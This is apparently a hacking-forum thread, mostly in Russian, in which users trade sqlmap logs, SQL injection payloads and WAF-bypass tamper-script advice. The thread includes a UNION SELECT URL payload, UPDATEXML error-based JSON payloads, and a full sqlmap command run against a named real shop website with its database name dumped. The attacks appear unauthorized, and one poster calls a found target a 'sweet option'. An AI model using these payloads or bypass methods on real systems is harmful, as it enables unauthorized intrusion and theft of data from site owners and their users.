[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop ping 'suspicious' requests Как можно обойти? [08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:06:18] [CRITICAL] connection timed out to the target URL [08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:08:19] [CRITICAL] connection timed out to the target URL [08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH ERE or HAVING clause (NOT)' injectable (with --string="write") [08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retriev al [08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa lse positive [08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:10:19] [CRITICAL] connection timed out to the target URL [08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:12:19] [CRITICAL] connection timed out to the target URL [08:12:19] [WARNING] false positive or unexploitable injection point detected [08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable ваф не дает прокрутить скулю
Доброго дня! К примеру знаю что в БД есть строка с почтой admin@admin.com, но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с admin@admin.com?
Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать? Уж один сладкий вариант подвернулся)) Всех с наступающим Новым 2022 Годом.
Code: Parameter: JSON #1* ((custom) POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl ause (UPDATEXML) Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"} Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D ELIMITER_STOP]'),[RANDNUM1]) --- [12:20:48] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.2.34 back-end DBMS: MySQL >= 5.1 [12:20:48] [INFO] fetching database names [12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs S'='BbsS [12:20:49] [WARNING] the SQL query provided does not return any output [12:20:49] [INFO] falling back to current database [12:20:49] [INFO] fetching current database [12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx [12:20:49] [DEBUG] performed 1 query in 0.65 seconds [12:20:49] [CRITICAL] unable to retrieve the database names
Ребят помогите как запихнуть в sqlmap есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода /threads/425295/
what MYSQL version ? https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится Пробовал в ручную как у автора тут Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже
[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable [13:53:45] [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times К сожалению tamper не помог
Spoiler: sqlmap payload python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries available databases [1]: [*] mkeducat_books2019
What is wrong in request ? python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","module":"install-broadcast","op":"setup","packageAppName":"ar.ity","position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch [05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108 P.S also checked "type" and 'type' in -p and in request data P.S.S sqlmap -r request.txt doesn't work in this case ( and this payload workable, because other scanner can execute sql query with this payload